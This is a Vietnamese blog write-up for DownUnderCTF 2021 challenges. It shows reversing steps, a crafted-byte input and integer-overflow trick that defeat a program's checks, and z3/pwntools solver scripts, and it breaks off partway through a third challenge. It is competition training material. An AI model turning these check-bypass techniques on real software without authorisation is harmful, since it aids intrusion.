<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Overview Nguồn : https:&#x2F;&#x2F;play.duc.tf&#x2F; Nhận xét : Ngoài việc khó ra thì hết rồi :))  Write ups1. No strings - Reversing Bài này khá đơn giản, follow theo đề xem qua các chuỗi có trong file đã cho (có t">
<meta property="og:type" content="article">
<meta property="og:title" content="DownUnderCTF 2021">
<meta property="og:url" content="https://mekanican.github.io/2021/09/24/DownUnderCTF2021/index.html">
<meta property="og:site_name" content="Random blog">
<meta property="og:description" content="Overview Nguồn : https:&#x2F;&#x2F;play.duc.tf&#x2F; Nhận xét : Ngoài việc khó ra thì hết rồi :))  Write ups1. No strings - Reversing Bài này khá đơn giản, follow theo đề xem qua các chuỗi có trong file đã cho (có t">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/no_strings.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/no_strings_1.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/flag_loader.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/flag_loader_1.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/flag_loader_2.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/flag_loader_3.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/flag_loader_4.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/flag_loader_5.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/flag_loader_6.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/connect_the_dots.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/connect_the_dots_2.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/connect_the_dots_3.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/connect_the_dots_4.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/outbackdoor.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/outbackdoor_1.png">
<meta property="og:image" content="https://mekanican.github.io/images/ductf2021/babygame.png">
<meta property="article:published_time" content="2021-09-24T18:16:00.000Z">
<meta property="article:modified_time" content="2021-09-27T07:02:54.635Z">
<meta property="article:author" content="Nghia Vo">
<meta property="article:tag" content="Reversing">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://mekanican.github.io/images/ductf2021/no_strings.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>DownUnderCTF 2021</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Back to top " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&text=DownUnderCTF 2021"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&title=DownUnderCTF 2021"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&is_video=false&description=DownUnderCTF 2021"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=DownUnderCTF 2021&body=Check out this article: https://mekanican.github.io/2021/09/24/DownUnderCTF2021/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&title=DownUnderCTF 2021"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&title=DownUnderCTF 2021"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&title=DownUnderCTF 2021"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&title=DownUnderCTF 2021"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&name=DownUnderCTF 2021&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://mekanican.github.io/2021/09/24/DownUnderCTF2021/&t=DownUnderCTF 2021"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Overview"><span class="toc-number">1.</span> <span class="toc-text">Overview</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Write-ups"><span class="toc-number">2.</span> <span class="toc-text">Write ups</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-No-strings-Reversing"><span class="toc-number">2.1.</span> <span class="toc-text">1. No strings - Reversing</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-Flag-loader-Reversing"><span class="toc-number">2.2.</span> <span class="toc-text">2. Flag loader - Reversing</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-Connect-the-dots-Reversing"><span class="toc-number">2.3.</span> <span class="toc-text">3. Connect the dots - Reversing</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-OutBackdoor-Pwn"><span class="toc-number">2.4.</span> <span class="toc-text">4. OutBackdoor - Pwn</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-babygame-Pwn"><span class="toc-number">2.5.</span> <span class="toc-text">5. babygame - Pwn</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        DownUnderCTF 2021
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Nghia Vo</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2021-09-24T18:16:00.000Z" itemprop="datePublished">24-09-2021</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/CTF/">CTF</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/Pwn/" rel="tag">Pwn</a>, <a class="tag-link-link" href="/tags/Reversing/" rel="tag">Reversing</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="Overview"><a href="#Overview" class="headerlink" title="Overview"></a>Overview</h2><ul>
<li>Nguồn : <a target="_blank" rel="noopener" href="https://play.duc.tf/">https://play.duc.tf/</a></li>
<li>Nhận xét : Ngoài việc khó ra thì hết rồi :))</li>
</ul>
<h2 id="Write-ups"><a href="#Write-ups" class="headerlink" title="Write ups"></a>Write ups</h2><h3 id="1-No-strings-Reversing"><a href="#1-No-strings-Reversing" class="headerlink" title="1. No strings - Reversing"></a>1. No strings - Reversing</h3><p><img src="/images/ductf2021/no_strings.png"></p>
<p>Bài này khá đơn giản, follow theo đề xem qua các chuỗi có trong file đã cho (có thể dùng strings của linux thay vì trâu bò IDA :) )</p>
<p><img src="/images/ductf2021/no_strings_1.png"></p>
<p><strong>flag: DUCTF{stringent_strings_string}</strong></p>
<h3 id="2-Flag-loader-Reversing"><a href="#2-Flag-loader-Reversing" class="headerlink" title="2. Flag loader - Reversing"></a>2. Flag loader - Reversing</h3><p><img src="/images/ductf2021/flag_loader.png"></p>
<p>Nhận xét chung về bài này thì khá là tốn thời gian cho việc nghĩ làm sao cho nó chạy &gt;&gt;&gt; chạy xong thì hết giờ :) Cũng là lần đầu đụng tới cái z3 để giải mấy bài toán tìm nghiệm, mất đâu đó hết nửa ngày để debug…</p>
<p>Sau khi bỏ vào IDA, ta có hàm main sau khi đã disassemble như sau:<br><img src="/images/ductf2021/flag_loader_1.png"></p>
<p>Tổng quan những thứ trong hàm này là chạy 3 hàm check (<code>check1</code>, <code>check2</code>, <code>check3</code>), lấy giá trị trả về của từng hàm (<code>v4</code>, <code>v5</code>, <code>v6</code>) nhân lại để <code>sleep</code> (sleep khá lâu đây &lt;(“)) sau đó là trả về flag cho người dùng.</p>
<p>Ngó qua hàm <code>init()</code><br><img src="/images/ductf2021/flag_loader_2.png"></p>
<p>Chương trình đã được set <code>alarm</code> ở 0x3C = 60s &gt;&gt;&gt; Phiên hoạt động phải xong trước 60s, hay nói cách khác là làm sao vừa chạy được hết 3 cái check kia và vừa in ra flag kịp giờ, <code>v4 * v5 * v6 &lt; 60</code> :))</p>
<p>Xem qua hàm <code>check1()</code>:</p>
<p><img src="/images/ductf2021/flag_loader_3.png"></p>
<p>Tổng quan về hàm này là sẽ đưa cho chương trình 5 ký tự, <code>xor</code> chuỗi vừa nhập với mảng <code>X</code> cộng tổng vào biến v1, lấy tích với biến đếm i vào biến v2. Nếu sau vòng lặp mà v1 khác 0 hoặc v2 bằng 0 thì sẽ kết thúc chương trình &gt;&gt;&gt; phải tìm cách né cái này.<br>Sau khi follow mảng <code>X</code> này ta được giá trị như sau<br><code>X[] = &#123;&#39;D&#39;, &#39;U&#39;, &#39;C&#39;, &#39;T&#39;, &#39;F&#39;&#125;</code></p>
<p>Theo phép xor thì chỉ cần xor với chính nó = 0 &gt;&gt;&gt; chuỗi nhập vào là “DUCTF” thì có thể pass được ?</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">┌──(meka㉿meka)-[~/ductf]</span><br><span class="line marked">└─$ ./flag_loader</span><br><span class="line">Give me five letters: DUCTF</span><br><span class="line">You failed the check! No flag <span class="keyword">for</span> you :(</span><br></pre></td></tr></table></figure>
<p>Tất nhiên không dễ như vậy rồi :)<br>Sau khi debug chương trình thì mình thấy được cái v2 sẽ = 0 nếu nhập y nguyên, nên ta sẽ sửa 1 tí bằng cách lấy “nhẹ” 1 chữ và bù “nhẹ” 1 chữ…<br><code>0 + 0 + 0 + 0 + 0 = 0 + -1 + 0 + 1 + 0 = 0</code></p>
<p>Ở đây thì mình sẽ bớt chữ U đi 1 và cộng thêm 1 cho chữ T (range 8 bit)</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;U&#x27;</span> = <span class="number">0x55</span></span><br><span class="line"><span class="string">&#x27;U&#x27;</span> ^ a = <span class="number">-1</span> = <span class="number">0xFF</span> =&gt; a = <span class="number">0x55</span> ^ <span class="number">0xFF</span> = <span class="number">0xAA</span></span><br><span class="line"><span class="string">&#x27;T&#x27;</span> = <span class="number">0x54</span></span><br><span class="line"><span class="string">&#x27;T&#x27;</span> ^ b = <span class="number">1</span> = <span class="number">0x01</span> =&gt; b = <span class="number">0x54</span> ^ <span class="number">0x01</span> = <span class="number">0x55</span></span><br></pre></td></tr></table></figure>

<p>Kết quả:<br><img src="/images/ductf2021/flag_loader_4.png"></p>
<p>Script cho màn 1 này</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">p.recvuntil(<span class="string">b&quot;Give me five letters: &quot;</span>)</span><br><span class="line">p.sendline(<span class="string">b&quot;\x44\xaa\x43\x55\x46&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>Vậy là xong được <code>check1</code> và ghi điểm cho mình 128s vào hàm <code>sleep</code> &lt;(“), thực ra lúc đầu mình nghĩ là phải làm sao cho số này càng nhỏ càng tốt, nhớ mang máng cỡ 40s nhưng tới 2 check sau bất khả thi quá nên mới phải nghĩ cách sau:</p>
<p>Như đã thấy ở hàm main, <code>v4</code>, <code>v5</code>, <code>v6</code> đều là biến int (32 bit), giá trị trả về của <code>check1</code> tối đa có 8 bit, của <code>check2</code>, <code>check3</code> là 16 bit (sẽ nói ở phần sau) nên ta sẽ có ý tưởng overflow 32 bit như sau:</p>
<p>Ta đã biết <code>v4 = 128 = 2 ^ 7</code><br>Và mục tiêu là giảm thiểu thời gian sleep tối đa (ở đây là 0 luôn cho tiện)<br>Nên mục tiêu sẽ là <code>v4 * v5 * v6 = 2 ^ 32 = 0</code><br>Suy ra <code>v5 * v6 = 2^25</code>, chọn <code>v5 = 2 ^ 12</code>, <code>v6 = 2 ^ 13</code></p>
<p>Hàm <code>check2</code><br><img src="/images/ductf2021/flag_loader_5.png"></p>
<p>Tổng quan về hàm này sẽ là đưa cho 1 số bất kỳ, tìm cặp (x,y) sao cho thoả các điều kiện<br>Nhét vào z3 và giải thôi :))</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">p.recvuntil(<span class="string">b&quot;Solve this: x + y = &quot;</span>)</span><br><span class="line">num = <span class="built_in">int</span>(p.recvline().strip())</span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> z3 <span class="keyword">import</span> *</span><br><span class="line">x, y = BitVecs(<span class="string">&quot;x y&quot;</span>, <span class="number">32</span>)</span><br><span class="line">o = Solver()</span><br><span class="line"><span class="comment"># Ở đây không nhét điều kiện x &gt; num &amp; y &gt; num cho đơn giản</span></span><br><span class="line">o.add(x != <span class="number">0</span>)</span><br><span class="line">o.add(y != <span class="number">0</span>)</span><br><span class="line">o.add(x + y == num)</span><br><span class="line">o.add((x * y) % (<span class="number">2</span> ** <span class="number">16</span>) == (<span class="number">2</span>**<span class="number">12</span>))</span><br><span class="line"></span><br><span class="line">o.check()</span><br><span class="line">f = o.model()</span><br><span class="line"></span><br><span class="line">x1 = f[x].as_long()</span><br><span class="line">x2 = f[y].as_long()</span><br><span class="line">p.sendline(<span class="built_in">str</span>(x1).encode() + <span class="string">b&#x27; &#x27;</span> + <span class="built_in">str</span>(x2).encode())</span><br></pre></td></tr></table></figure>

<p>Hàm <code>check3</code></p>
<p><img src="/images/ductf2021/flag_loader_6.png"></p>
<p>Tương tự, ta cũng có:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">a, b, c, d, e = BitVecs(<span class="string">&quot;a b c d e&quot;</span>, <span class="number">32</span>)</span><br><span class="line">o2 = Solver()</span><br><span class="line">p.recvuntil(<span class="string">b&quot;Now solve this: x1 + x2 + x3 + x4 + x5 = &quot;</span>)</span><br><span class="line">num = <span class="built_in">int</span>(p.recvline().strip())</span><br><span class="line"></span><br><span class="line">o2.add(a &gt; <span class="number">0</span>)</span><br><span class="line">o2.add(b &gt; <span class="number">0</span>)</span><br><span class="line">o2.add(c &gt; <span class="number">0</span>)</span><br><span class="line">o2.add(d &gt; <span class="number">0</span>)</span><br><span class="line">o2.add(e &gt; <span class="number">0</span>)</span><br><span class="line">o2.add(a &lt; b)</span><br><span class="line">o2.add(b &lt; c)</span><br><span class="line">o2.add(c &lt; d)</span><br><span class="line">o2.add(d &lt; e)</span><br><span class="line">o2.add(a + b + c + d + e == num)</span><br><span class="line">o2.add((c - b) * (e - d) % (<span class="number">2</span>**<span class="number">16</span>) == <span class="number">2</span>**<span class="number">13</span>)</span><br><span class="line"></span><br><span class="line">o2.check()</span><br><span class="line">f = o2.model()</span><br><span class="line"></span><br><span class="line">x1 = f[a].as_long()</span><br><span class="line">x2 = f[b].as_long()</span><br><span class="line">x3 = f[c].as_long()</span><br><span class="line">x4 = f[d].as_long()</span><br><span class="line">x5 = f[e].as_long()</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="built_in">str</span>(x1).encode() + </span><br><span class="line">	<span class="string">b&#x27; &#x27;</span> + <span class="built_in">str</span>(x2).encode() + </span><br><span class="line">	<span class="string">b&#x27; &#x27;</span> + <span class="built_in">str</span>(x3).encode() + </span><br><span class="line">	<span class="string">b&#x27; &#x27;</span> + <span class="built_in">str</span>(x4).encode() + </span><br><span class="line">	<span class="string">b&#x27; &#x27;</span> + <span class="built_in">str</span>(x5).encode())</span><br></pre></td></tr></table></figure>
<p>Kết quả:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">[+] Opening connection to pwn-2021.duc.tf on port 31919: Done</span><br><span class="line marked">[*] Switching to interactive mode</span><br><span class="line">You<span class="string">&#x27;ve passed all the checks! Please be patient as the flag loads.</span></span><br><span class="line"><span class="string">Loading flag... (this may or may not take a while)</span></span><br><span class="line"><span class="string">DUCTF&#123;y0u_sur3_kn0w_y0ur_int3gr4l_d4t4_typ3s!&#125;</span></span><br></pre></td></tr></table></figure>

<p><strong>flag:DUCTF{y0u_sur3_kn0w_y0ur_int3gr4l_d4t4_typ3s!}</strong></p>
<h3 id="3-Connect-the-dots-Reversing"><a href="#3-Connect-the-dots-Reversing" class="headerlink" title="3. Connect the dots - Reversing"></a>3. Connect the dots - Reversing</h3><p><img src="/images/ductf2021/connect_the_dots.png"></p>
<p>Bài này thì tốn sương sương có một ngày &lt;(“) nguyên nhân chính là sài cái extract data IDA ko quen nên mảng lỗi chỗ nọ chỗ kia &gt;&gt;&gt; giải sai hướng phải quay xe mấy lần.</p>
<p>Sau khi bỏ vào IDA, hàm main như sau:</p>
<p><img src="/images/ductf2021/connect_the_dots_2.png"></p>
<p>Tổng quan ở hàm này là sẽ nhập 1 chuỗi từ người dùng, độ dài tối đa là 0xDEF = <code>3567</code>, chuỗi sau đó sẽ qua hàm <code>sub_11E0</code> xử lý và đem xor lại với một mảng khác và in ra màn hình. Dự đoán ban đầu của mình là chuỗi kết quả sẽ được in ra nên không cần quan tâm khúc xor kia.</p>
<p>Hàm <code>sub_11E0</code></p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">sub_11E0</span><span class="params">(<span class="keyword">char</span> *a1)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> *v1; <span class="comment">// rax</span></span><br><span class="line">  <span class="keyword">int</span> v2; <span class="comment">// eax</span></span><br><span class="line">  __int64 result; <span class="comment">// rax</span></span><br><span class="line">  <span class="keyword">char</span> *v4; <span class="comment">// [rsp+8h] [rbp-58h]</span></span><br><span class="line">  <span class="keyword">int</span> v5; <span class="comment">// [rsp+14h] [rbp-4Ch]</span></span><br><span class="line">  <span class="keyword">int</span> v6; <span class="comment">// [rsp+18h] [rbp-48h]</span></span><br><span class="line">  <span class="keyword">int</span> v7; <span class="comment">// [rsp+1Ch] [rbp-44h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v8; <span class="comment">// [rsp+24h] [rbp-3Ch]</span></span><br><span class="line">  <span class="keyword">int</span> v9[<span class="number">8</span>]; <span class="comment">// [rsp+30h] [rbp-30h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v10; <span class="comment">// [rsp+58h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v4 = a1;</span><br><span class="line">  v10 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  v5 = <span class="number">0</span>;</span><br><span class="line">  v6 = <span class="number">0</span>;</span><br><span class="line">  v9[<span class="number">0</span>] = <span class="number">-1</span>;</span><br><span class="line">  v9[<span class="number">1</span>] = <span class="number">-1</span>;</span><br><span class="line">  v9[<span class="number">2</span>] = <span class="number">-1</span>;</span><br><span class="line">  v9[<span class="number">3</span>] = <span class="number">-1</span>;</span><br><span class="line">  v9[<span class="number">4</span>] = <span class="number">-1</span>;</span><br><span class="line">  v9[<span class="number">5</span>] = <span class="number">-1</span>;</span><br><span class="line">  v9[<span class="number">6</span>] = <span class="number">-1</span>;</span><br><span class="line">  v9[<span class="number">7</span>] = <span class="number">-1</span>;</span><br><span class="line">  v7 = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">2</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( !*v4 )</span><br><span class="line">      <span class="built_in">sub_1179</span>();</span><br><span class="line">    v1 = v4++;</span><br><span class="line">    <span class="built_in"><span class="keyword">switch</span></span> ( *v1 )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">case</span> <span class="string">&#x27;h&#x27;</span>:</span><br><span class="line">        <span class="keyword">if</span> ( dword_4080[v6] &amp; <span class="number">1</span> )</span><br><span class="line">          <span class="built_in">sub_1179</span>();</span><br><span class="line">        --v6;</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="string">&#x27;j&#x27;</span>:</span><br><span class="line">        <span class="keyword">if</span> ( dword_4080[v6] &amp; <span class="number">2</span> )</span><br><span class="line">          <span class="built_in">sub_1179</span>();</span><br><span class="line">        v6 += <span class="number">60</span>;</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="string">&#x27;k&#x27;</span>:</span><br><span class="line">        <span class="keyword">if</span> ( dword_4080[v6] &amp; <span class="number">8</span> )</span><br><span class="line">          <span class="built_in">sub_1179</span>();</span><br><span class="line">        v6 -= <span class="number">60</span>;</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="string">&#x27;l&#x27;</span>:</span><br><span class="line">        <span class="keyword">if</span> ( dword_4080[v6] &amp; <span class="number">4</span> )</span><br><span class="line">          <span class="built_in">sub_1179</span>();</span><br><span class="line">        ++v6;</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">      <span class="keyword">case</span> <span class="string">&#x27;x&#x27;</span>:</span><br><span class="line">        <span class="keyword">if</span> ( !(dword_4080[v6] &amp; <span class="number">0x80</span>) )</span><br><span class="line">          <span class="built_in">sub_1179</span>();</span><br><span class="line">        v8 = (dword_4080[v6] &gt;&gt; <span class="number">4</span>) &amp; <span class="number">7</span>;</span><br><span class="line">        <span class="keyword">if</span> ( (<span class="keyword">int</span>)<span class="built_in">sub_1196</span>(v9, <span class="number">8LL</span>, v8) &gt;= <span class="number">0</span> )</span><br><span class="line">          <span class="built_in">sub_1179</span>();</span><br><span class="line">        v2 = v7++;</span><br><span class="line">        v9[v2] = v8;</span><br><span class="line">        v5 = (<span class="keyword">unsigned</span> __int8)dword_4060[v8] ^ (dword_4060[v8] &gt;&gt; <span class="number">8</span>) &amp; v5;</span><br><span class="line">        <span class="keyword">if</span> ( v7 != <span class="number">8</span> )</span><br><span class="line">          <span class="keyword">continue</span>;</span><br><span class="line">        <span class="keyword">if</span> ( v5 != <span class="number">255</span> )</span><br><span class="line">          <span class="built_in">sub_1179</span>();</span><br><span class="line">        <span class="keyword">return</span> <span class="number">1LL</span>;</span><br><span class="line">      <span class="keyword">default</span>:</span><br><span class="line">        <span class="built_in">sub_1179</span>();</span><br><span class="line">        <span class="keyword">return</span> result;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>Sau khi kiểm thử hàm <code>sub_1196</code> thì đây chỉ là hàm báo sai và kết thúc chương trình</p>
<p>Hàm <code>sub_1196</code>:</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 __fastcall <span class="title">sub_1196</span><span class="params">(<span class="keyword">int</span> *a1, <span class="keyword">int</span> a2, <span class="keyword">int</span> a3)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> i; <span class="comment">// [rsp+1Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; a2; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( a3 == a1[i] )</span><br><span class="line">      <span class="keyword">return</span> (<span class="keyword">unsigned</span> <span class="keyword">int</span>)i;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0xFFFFFFFF</span>LL;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>Ở hàm này sẽ chỉ check xem phần tử a3 có trong mảng không, nếu đúng thì trả về giá trị âm</p>
